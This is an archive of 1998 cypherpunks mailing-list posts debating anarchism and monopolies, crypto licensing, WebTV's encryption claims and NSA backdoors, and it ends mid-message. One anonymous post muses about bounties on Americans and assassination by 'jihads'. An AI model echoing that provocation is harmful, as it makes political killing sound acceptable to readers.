At 4:51 PM -0400 on 10/8/98, David Miller wrote:

> Could the term "green iguanas" be symbolic of US currency?

Naw... But I hereby nominate the green iguana to be the official mascot of
the cypherpunk crypto-refugee community on Anguilla.

I can see it on the "alternative" FC99 shirt now. A bunch of iguanas, (at
least one in black BDUs :-)), on a raft of (tamper resistant)
cryptoaccellerator and DES-cracker parts, styrofoam, and Stronghold and Red
Hat boxes, all with a silhouette of Anguilla looming in the background.
Maybe with Jerry Gumbs standing on the beach holding a "God Save the Queen"
sign?

But wait, there's more.  How about the Anguillan flag, with *iguanas*
replacing the dolphins...


Can you tell the equinox is over?

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 9 Oct 1998 04:07:20 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Another potential flaw in current economic theory... (fwd)
In-Reply-To: <v04011701b2404f900352@[206.189.103.244]>
Message-ID: <v04011707b242c1993405@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:19 PM -0500 10/6/98, William H. Geiger III wrote:
>>At 2:35 PM -0500 10/6/98, Steve Mynott wrote:
>>>any true cypherpunk must be a libertarian..
>>	Libertarians are just cowardly anarchists, they lack the courage of
>>their convictions to take the last step and eliminate government
>>altogether.
>Libertarians are well aware of the need for government, they are also

	Libertarians are afraid of getting rid of their saftey nets.

>aware of the dangers to personal freedom that governments represent. The
>goal of the Libertarians is to provide a system that minimizes government
>and maximizes personal freedom. In the US this system takes the form of a

	The creation of government is incompatible with concept of freedom,
it is like a doctor saying that he/she will introduce "a little cancer" to
help cure you of something.

	Like radiation or chemotherapy it works for a short time, but
causes the very problems it set out to solve in the long run.

	As our current state would show, freedoms are not always lost in
one big election, nor in one gigantic battle, but like a mountain is
reduced to a plain, one drop of water, one soft gust of wind at a time.

>Constitutionally limited government (ie: the US Constitution interpreted
>as a limiting document not an enabling one).

	What prevents it from changing contexts?

	Nothing.

	The current constitution was voided by the Civil War/War of
Northern Aggression, and we haven't had a government that was willing to
restrict it's activities to its prescribed borders since then (if we even
did before then, I seem to remember A. Jackson explicitly ignoring a
supreme court ruling that lead to thousands of deaths).

	Your system depends on strong minded, enlightened people willing to
work together and not look to someone else to solve their problems.

	With those kind of people any system will work, and so would anarchy.

	Without those kind of people, no system will work for long
(especially without degenerating into a tyranny of some kind).

>Anarchism does not work. It is a pipe dream much like Communism that only
>leads to Totalitarianism.

	It works every day anywhere anyone has the capability to make a
choice, and does so without consulting their local branch of the Mob.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent.
Inc.::petro@playboy.com::petro@bounty.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 04:04:42 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810081944.OAA19796@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 8 Oct 1998 14:15:12 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> >> Umm...  both of those are around because the governemtn made the cost of
> >> delivering both alcohol and drugs prohibitively high,
> >
> >That's inaccurate. The Mafia pre-dated the US by several hundred years if
> 
> 	So what? There was probably a government wherever the started, and
> they probably started out providing services that their local government
> prohibited.

This begs the question, even when presented with evidence that supports such
assertions you dismiss it out of hand.

No point in even responding to your posts on this topic any further.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 04:12:20 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199810081945.OAA19853@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 8 Oct 1998 21:21:32 +0200
> From: Anonymous <nobody@replay.com>

> 
> HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?
> 

How much have YOU written (as if anyone really cares)?


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 9 Oct 1998 03:19:42 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Anguilla in the news
Message-ID: <19981008144720.A11974@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



http://www.nytimes.com/yr/mo/day/news/national/science/sci-lizard-raft.html

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@is9.nyu.edu>
Date: Thu, 8 Oct 1998 23:11:15 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <199810080256.VAA15750@einstein.ssz.com>
Message-ID: <361CD086.CD3EB6F@is9.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Wed, 7 Oct 1998 22:08:08 -0400 (EDT)
> > From: Ryan Anderson <ryan@michonline.com>
> > Subject: Re: I thought of an initialy regulated industry!... (fwd)
> 
> > > Consider the difference in volume of these two waste products...
> >
> >
> > Really?  The amount of fuel that goes into a nuclear plant is farirly low,
> > compared to the amount shoved into a coal plant.
> 
> Exactly my point.
> 
> A 1000MW coal plant produces approx 300,000 tons of waste product per year.
> A nuclear plan produces .5. This means the concentration of the chemicals in
> the coal plant are much lower by many orders of magnitude than the nuclear,
> hence making the nuclear waste more toxic by a great deal.
> 

The latter does not necessarily follow from the former.  Consider the
example of natural gas and gasoline.  You don't get to conclude your
argument that easily! :)

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 8 Oct 1998 22:29:53 +0800
To: fod@brd.ie
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <361CAC40.5BBDD268@brd.ie>
Message-ID: <199810081350.OAA11882@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Mr Johnny Come Lately writes:
> Having said that I do question whether take-up of free crypto components
> by commercial companies genuinely results in "strong cryptographic
> products". I'm not meaning to denigrate Eric's work in any way, but in
> my experience the likes of SSLeay is very often shovelled into products
> by companies who don't understand crypto, don't understand SSL, and
> barely understand SSLeay. Even those who do understand what they are
> doing are typically working "on Internet time". Certainly merely linking
> to SSLeay does NOT result in a "strong cryptographic product", not by
> any stretch of the imagination.

Let me clue you in here: you are talking to the Caped Green one, who
currently is working for C2Net, which just happens to be selling
Stronghold, a commercial version of Apache, which is the most widely
used secure web server in the world.  Guess what: Apache uses SSLeay,
and Stronghold also inherits this.

I would also rate the folks at C2Net as pretty crypto clueful, btw.
2nd hint: C2Net is currently employing Eric Young also, and Eric's
SSLeay still has the same license.

> > The bottom line is that GNU-licensing is more restrictive than
> > BSD/SSLeay-style licensing. Hence identical freeware will see less
> > deployment under GNU than under BSD.
> >
> > Cyphpunks believe that more strong crypto is better.
> 
> Well then, "Cypherpunks write code". Wide deployment of crypto
> components in closed-source programs (especially by cluebags) is neither
> necessary nor sufficient to achieve "more strong crypto" in the sense
> that Cypherpunks mean it, in my opinion. (Yes, it's better than nothing,
> but not much better.)

What sense do cypherpunks mean strong crypto in then?  Perhaps you
could educate us?

They mean lots of crypto out there firstly, so that the when the
government tries the next GAK initiative the government has less
chance of pushing it through, as more people know what crypto is, and
understand how outrageous mandatory domestic GAK is.  Secondly they
mean strong crypto, as in full key strengths, and no flaws.  But
mainly their interest in deploying strong crypto by whatever means
available (commercial, freeware, or whatever) for a purpose: to
undermine the power of the state, to allow people to go about the
business unhindered by the state.

Cypherpunks also get involved in breaking crypto, and this is usually
enough to get massively commercially deployed strong crypto with
unintentional flaws converted quickly into massively deployed crypto
without the flaws.  eg. Netscape's random number generator weakness,
which netscape fixed immediately.

> > The conclusion in the GNU vs. BSD/SSLeay/etc. license debate
> > should be clear.
> 
> Well, it clearly isn't, as evidenced by the large number of fairly
> bright people arguing about it. :)

It's clear to pretty much all the cypherpunks I've seen contribute to
the thread, Eric, Perry, Adam Shostack, Jim McCoy, Bruce Schneier.
Probably there were some others who contributed to the thread also.

You don't get it, but then have you ever written any crypto code with
the objective of undermining the power of the state?  Is this your aim
in writing your open source application code that you name dropped?

This is what I meant by my short rant about coderpunks detracting from
the cypherpunk objective: siphons off 'punks from cypherpunks into a
crypto-politically neutral environment.  Then it gets increasingly
more crypto-politically neutral subscribers, and anyone reminding or
commenting that the original aim of the game was to distribute strong
crypto to undermine the state, gets told by the local retro moderators
that political stuff isn't welcome.

Try reading the cyphernomicon (*), if you haven't.

Adam
	(*) http://www.oberlin.edu/~brchkind/cyphernomicon/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 04:10:04 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another potential flaw in current economic theory... (fwd)
Message-ID: <199810081951.OAA20049@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 8 Oct 1998 14:35:41 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Another potential flaw in current economic theory... (fwd)

> >aware of the dangers to personal freedom that governments represent. The
> >goal of the Libertarians is to provide a system that minimizes government
> >and maximizes personal freedom. In the US this system takes the form of a
> 
> 	The creation of government is incompatible with concept of freedom,

Then freedom is incompatible with human psychology. People are social
animals and will build social institutions (ie government), it's in their
genes.

> it is like a doctor saying that he/she will introduce "a little cancer" to
> help cure you of something.

The point is to create a market with 'fair competition', something that
won't occur naturaly because of a variety of reasons. 

If you'd like to see some of them then refer to:

Inidividualism and Economic Order
FA Hayek
ISBN 0-226-32093-6
Individualism: true and false, Section 7 (pp. 45 in my copy)


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 04:22:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Something else about 'freedom'...
Message-ID: <199810081956.OAA20142@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



It doesn't mean the creation of a social or economic state (or lack of one)
that promotes the abuse or belittlement of others 'freedoms'.

I'd still like to see an explanation of how anarcho-capitalist or free-market
promoters expect this to be resolved.

My suspicion is that this sort of opportunity is *exactly* what they want.
Then *they* get to be the ones using force for coercive ends.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jukka E Isosaari <jei@zor.hut.fi>
Date: Thu, 8 Oct 1998 21:10:11 +0800
To: cypherpunks@toad.com
Subject: Crypto AG: The NSA's Trojan Whore?
Message-ID: <Pine.LNX.3.96.981008153518.14319G-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain



http://caq.com/cryptogate

Are people familiar with this document?

Why shouldn't NSA have implanted this kind of back-doors
in various software and operating systems as well?

It seems to have worked so very well in the past.

++ J





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 05:26:47 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810082107.QAA20666@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 08 Oct 1998 19:58:31 +0000
> From: Michael Hohensee <mah248@is9.nyu.edu>
> Subject: Re: I thought of an initialy regulated industry!... (fwd)

> > What specificaly is there about the relationship between natural gas and
> > gasoline that leads you to believe that the comparison of lethality between
> > the waste products of a coal plant vurses a nuclear plant is such that the
> > waste of a nuclear plant is more lethal because there is more toxic
> > byproduct and it is in higher concentrations?
> 
> Absolutely nothing.  That's my point, not yours --or at least not the
> point you made in your previous post.


It is *exactly* the point I have made from day 1.

If you believe otherwise the mistake is yours.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 9 Oct 1998 07:30:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Something else about 'freedom'...
Message-ID: <361D45C4.18C8@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



***
My suspicion is that this sort of opportunity is *exactly* what they
want. Then *they* get to be the ones using force for coercive ends.
***
Isn't this the "kill the unbelievers" scenario? Old and revered
behavior. Tribal. Elemental.

I don't think 'freedom' means 'anarchy.' 
Nor does 'anarchy' necessarily mean 'violent lawlessness.' 
And 'rule of law' does not mean 'safety and security.' 

As strong as the need for order is, so is the need for chaos. Remove
either and we lose. 

I think freedom comes from order and knowing what to do with that
freedom comes from chaos. 

No worries, no thoughts or you can't really enjoy an evening martini if
you drink forty-two of them.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 9 Oct 1998 07:41:54 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A31@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




The Mafia has had two primary characteristics:

a) the use of force
b) trade in elicit and prohibited goods and services

Unless you can claim a reference to a Mafia at some time and place that
had neither characteristics and a market which they monopolized which
lacked any other intervention, then this all is utterly irrelevant to
the discussion at hand.

	Matt

> -----Original Message-----

> > >That's inaccurate. The Mafia pre-dated the US by several 
> hundred years if




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 9 Oct 1998 04:58:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Cypherpunks Agenda
In-Reply-To: <v0313030ab242a140c921@[209.133.20.44]>
Message-ID: <v0401178ab242cc120089@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



One is reminded of a quote (I'm still looking for the exact version) by
Washington Roebling, the chief engineer of the Brooklyn Bridge, when,
invalid from decompression sickness, his management of the works from his
bedroom window was called into question.

Something about how a single man, in a single afternoon, could plan a
year's work for thousands.

;-).

The cost of anything is the foregone alternative; if we lived here, we'd be
home now; et cetera.

Cypherpunks sit in their barcoloungers (or cubicles) and mosh. :-).

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Fri, 9 Oct 1998 00:39:32 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810081350.OAA11882@server.eternity.org>
Message-ID: <361CE49F.C858A2CE@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back wrote: 
> Mr Johnny Come Lately writes:

Adam, in future please spare me your warrantless insults. Thanks.

> > Having said that I do question whether take-up of free crypto components
> > by commercial companies genuinely results in "strong cryptographic
> > products". I'm not meaning to denigrate Eric's work in any way, but in
> > my experience the likes of SSLeay is very often shovelled into products
> > by companies who don't understand crypto, don't understand SSL, and
> > barely understand SSLeay. Even those who do understand what they are
> > doing are typically working "on Internet time". Certainly merely linking
> > to SSLeay does NOT result in a "strong cryptographic product", not by
> > any stretch of the imagination.
> 
> Let me clue you in here: you are talking to the Caped Green one, who
> currently is working for C2Net, which just happens to be selling
> Stronghold, a commercial version of Apache, which is the most widely
> used secure web server in the world.  Guess what: Apache uses SSLeay,
> and Stronghold also inherits this.

I'm familiar with C2Net. If Stronghold is any good, that is because
C2net and/or the Apache team know what they are doing, not just because
they picked up a free SSL library on the net. It's easy to build
insecure products on good crypto, and many other companies are busy
doing just that. In fact, it's funny that you tout a "secure web server"
as "strong crypto" since in that context SSL is usually vulnerable to
being end-run by web spoofing. Oops. Oh well, it uses strong crypto, so
it must be good.

> > > The bottom line is that GNU-licensing is more restrictive than
> > > BSD/SSLeay-style licensing. Hence identical freeware will see less
> > > deployment under GNU than under BSD.
> > >
> > > Cyphpunks believe that more strong crypto is better.
> >
> > Well then, "Cypherpunks write code". Wide deployment of crypto
> > components in closed-source programs (especially by cluebags) is neither
> > necessary nor sufficient to achieve "more strong crypto" in the sense
> > that Cypherpunks mean it, in my opinion. (Yes, it's better than nothing,
> > but not much better.)
> 
> What sense do cypherpunks mean strong crypto in then?  Perhaps you
> could educate us?
> 
> They mean lots of crypto out there firstly, so that the when the
> government tries the next GAK initiative the government has less
> chance of pushing it through, as more people know what crypto is, and
> understand how outrageous mandatory domestic GAK is.  Secondly they
> mean strong crypto, as in full key strengths, and no flaws.  But
> mainly their interest in deploying strong crypto by whatever means
> available (commercial, freeware, or whatever) for a purpose: to
> undermine the power of the state, to allow people to go about the
> business unhindered by the state.

Then I guess you agree that closed-source deployment is neither
necessary nor sufficient to achieve "strong crypto". Not really sure why
you're arguing in that case.

> Cypherpunks also get involved in breaking crypto, and this is usually
> enough to get massively commercially deployed strong crypto with
> unintentional flaws converted quickly into massively deployed crypto
> without the flaws.  eg. Netscape's random number generator weakness,
> which netscape fixed immediately.

That's condescending and irrelevant. Did anyone ever fix web spoofing?

> > > The conclusion in the GNU vs. BSD/SSLeay/etc. license debate
> > > should be clear.
> >
> > Well, it clearly isn't, as evidenced by the large number of fairly
> > bright people arguing about it. :)
> 
> It's clear to pretty much all the cypherpunks I've seen contribute to
> the thread, Eric, Perry, Adam Shostack, Jim McCoy, Bruce Schneier.
> Probably there were some others who contributed to the thread also.
> 
> You don't get it, but then have you ever written any crypto code with
> the objective of undermining the power of the state?  Is this your aim
> in writing your open source application code that you name dropped?

Yes, and yes. (I don't think you understand the term "name dropped" btw.
But given the name-dropping and appeal-to-authority tone of your whole
post, I wonder if you understand the term "irony").

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 9 Oct 1998 06:52:54 +0800
To: cypherpunks@cyberpass.net
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A193A7A28@mossbay.chaffeyhomes.com>
Message-ID: <v04011708b242c4aaec52@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:28 PM -0500 10/6/98, Matthew James Gering wrote:
>Jim Choate wrote:
>> > The only problem is your statement that one can dominate
>> > "saturable" markets without some artificial "mechanism."
>> Who said anything about 'artificial'?
>I did. I state you cannot have a coercive monopoly without artificial
>barriers (and hence a free market cannot have a coercive monopoly) and
>you disagree. I am not sticking any terms where they don't go, you have
>consistently theorized monopolies can exist in a free market.

	He is right--to an extent. Monopolies _can_ exist in a free market
under 2 conditions:

	1) Early stages of a market, when the creator/initial entrant has a
lead on the competition. This will (without "government" intervention) end
at some point unless:

	B) a competitor emerges that manages to meet the entire markets
desires for goods and services in such a way that profits are so thin as to
not attract competion.

	(1) can be effectively ignored, it is a localized (in time)
condition that the market will usually remedy. It is (b) where the
questions come in.

	I have maintained that Monopolies in ANY market large enough to
accept competition (i.e. larger than one or two purchasers) cannot continue
to exist (in fact would have a hard time coming into existence) without
some sort of government influence. Jim maintains that this is not only
possible, but happens UNLESS the government steps in. Of course Jim has in
the cotext of this discussion defined monopoly as a number of
producers/distributers greater than 2 which are acting in alleged collusion
for certain lengths of time. This ignores the fact that like in _any_
system one must account for a certain latency in a market for corrections
to take place. It also ignores the fact that no two (especially not 5 or 6)
people can agree on anything for long. Look at OPEC, they have a "monopoly"
of sorts (for very loose definitions of monopoly), and they can't seem to
stay in agreement for more than a couple months.

>Perhaps you should re-read my statement and not assume negatives where I
>clearly did not write them.
>
>> talking a free-market, there are *only* two participants;
>
>That is a twisted and absolutely unjustified definition of a free
>market. A free market lacks forceful restriction or prohibition of free
>[consensual] trade.

	In a free market, having only 2 participants should be the
definition of a monopoly. Any more than that, and the monopoly would start
to degrade.

>EXCEPT that which violates individual rights. I will argue that an
>anarcho-capitalist market that treats force as a commodity is NOT a free
>market.

	Why not?

	As long as force is susuptible (mind went blank, can't spell it) to
capital, and can be bought and sold, then it becomes a part of the equation
just like an extremely efficient manufacturing process, the availablity of
cheap energy, or a lazy, bloated competitor.

>> > You will find that that is not possible without an
>> > artificial barrier to competition.
>>
>> Demonstrate please. The problem with this view is that it
>> implies that given sufficient time *any* market strategy
>> will fail. In other words there is no best or efficient
>> strategy for a given market.
>
>There is but ONE market strategy: to price at a point lower than new
>entrants could sustain their business, and constantly increase
>productive efficiency and reduce costs.

	No, there isn't. Sometimes you can put your price point higher than
the competition would necessarily come in with, and trade off reputation
capitol for the extra.

	Look at the atheltic shoe market, you have Nike, Rebok, and a
couple others. No, let's say I have a shoe that is demonstratably better
(by any margin) than the best shoe out there. I even have a marketing
funding to compete with Nike. Will I be able to out price them? No. Even if
I had a manufacturing process that let me produce a shoe that competeted
with Nikes $150 shoes for about .50c, I couldn't price them at that level.
I _could_ price them about $50, and grow.

	This is a bad example because there are a lot more variables in the
shoe market than in something very simple like electricity, or water.

>This works great in the short term, especially in emerging industries,
>but it is statistically improbable for a company to maintain perfection.
>The market is not static, it is always changing and technology often
>favors new entrants who are not encumbered with legacy technology.

	Then there isn't "one market strategy", strategies must change and
develop with times and products. There would be different strategies for
different products, and at different points in a products life cycle.

>It is less relevant that such a company is unlikely to maintain that
>position forever, but that such efficient dominance is good for the
>market. Productive efficiency raises the standard of living.

	Alcoa. So good no one felt the need to compete. A monopoly that
wasn't a problem.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent.
Inc.::petro@playboy.com::petro@bounty.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 9 Oct 1998 05:57:14 +0800
To: cypherpunks@cyberpass.net
Subject: Re: does Web TV use forward secret cipher-suites? (Re: Web TV with 128b exported)
Message-ID: <199810082135.RAA22270@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Adam Back <aba@dcs.ex.ac.uk>
   >
   >   This is as others have noted cisco's doorbelling approach to GAK --
   >   having routers and automated systems doing decryption, and allowing
   >   LEA either direct access (possibly in this case), or access via
   >   complicit operators.
   >
   >   One question which might help determins just how bad this Web TV thing
   >   is, is does it use the forward secret ciphersuites.
   >
   >   If it did use FS ciphersuites, if the LEA starts reading traffic after
   >   some point (by asking the WebTV operators to do so, or by using a
   >   special LEA operator mode), he can't get all old traffic.
   >
   >   The EDH (ephemeral DH) modes are forward secret because a new DH key
   >   is generated for each session.
   >
   >   Some of the RSA modes are forward secret, but only on export grade RSA
   >   key sizes (512 bit).
   >
   >   As it got export permission, I fear the worst.  Perhaps even special
   >   LEA operator access.

Normally, an announcement of 128-bit crypto capabilities for a
home computer would mean the user has control of said crypto.

The WebTV computer:   http://developer.webtv.net/docs/sysgde/Default.htm

   o WebTV supports connectivity to the ISP of your choice.

   o Internet access (PPP, PAP)

   o HTML 1.0; HTML 2.0; HTML 3.2; frames compatibility; JavaScript 1.2

   o Image: GIF89a animation; JPEG; Progressive JPEG; PNG; TIFF-G3 fax in e-mail;
     X bitmap; Macromedia[tm] Flash 1.0

   o Audio: AU; . WAV; Real Audio 1.0; 2.0; 3.0; AIFF; Shockwave[tm] Audio; GSM;
     MPEG-1 Audio; MPEG-2 Audio; MPEG Layer 3; MOD; General MIDI; MIDI Karaoke;
     Quicktime audio; Zip decompression

   o Video: PEG-1 Video; MPEG-3 Video; VideoFlash[tm]

   o Processor: 112/167 Mhz R4640 processor

   o Security: SSL version 2 and 3; 40bit and 128bit RC4 encryption;
     root certificates for GTE, RSA Data Security (VeriSign), Thawte,
     and VeriSign Class 3 digital certificates

Can WebTV send end-to-end encrypted email to any other Net user?

Nope.

The press release claiming WebTV has 128-bit security
is another low in advertising obtuseness.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 9 Oct 1998 00:37:29 +0800
To: cypherpunks@Algebra.COM
Subject: Re: NT 5.0 and EFS -- A victory for widespread use of crypto?
Message-ID: <199810081610.SAA22577@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



geeman@best.com writes:
> 
> EFS is being deployed because They realized that with NTFS-readers
> available for other OSes besides NT there was no longer even the illusion
> of security offered by the NT architecture.

This is all true. However, the manner in which you state it sounds
very much like a deliberate attempt to trash Microsoft and NT.

The fact is that the identical arguments could be made toward any of
the standard Unix-like and all other popular operating systems. Linux,
*BSD, Solaris, HP-UX, AIX, et al.--even where the vendors have a 
`trusted' version--are all susceptible to the same attacks. Hence, by 
your reasoning, one would have to say that the architectures of every 
one of these operating systems do not offer `even the illusion of 
security'.

 - Frondeur




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 9 Oct 1998 01:12:44 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810081630.SAA23939@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Are there any web sites offering bounties for Americans, like the Americans
have for foreigners?  Or have their domain names been deregistered, their
spines pinched at the backbone, their WANs LAN'd?

Surely the well-funded jihads could do this.  And they haven't got
some law prohibiting assasination to hold them back.












  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 08:11:50 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810082352.SAA21802@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 8 Oct 1998 17:21:26 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> 	He is right--to an extent. Monopolies _can_ exist in a free market
> under 2 conditions: 
> 	1) Early stages of a market, when the creator/initial entrant has a
> lead on the competition. This will (without "government" intervention) end
> at some point unless:

Actualy, without a copyright or some similar 3rd party regulatory
intervention this is one of the points in a market development when a
monopoly *can't* develop. At this stage of the game the entry cost is
minimal and many potential groups have access to the necessary commodities
(real and intellectual) to get into the business. This also happens to be
when violence has the highest pay-off in staying in the market.

It's the strategy of the business that determines if it can *stay* in the
market.

To put it in terms capable of modelling, consider a petri dish with various
bacteria arranged around it. To start, no colony of any particular type
(comparable to business strategy) controls the entire surface of the ager.
Only after the market matures and competition begins to reduce the number of
colonies and the area of the colonies increases do we begin to see a
monopolization effect. This is modelled quite simply with cellular
automatons.

At this point in time what happens in a real-world business is that somebody
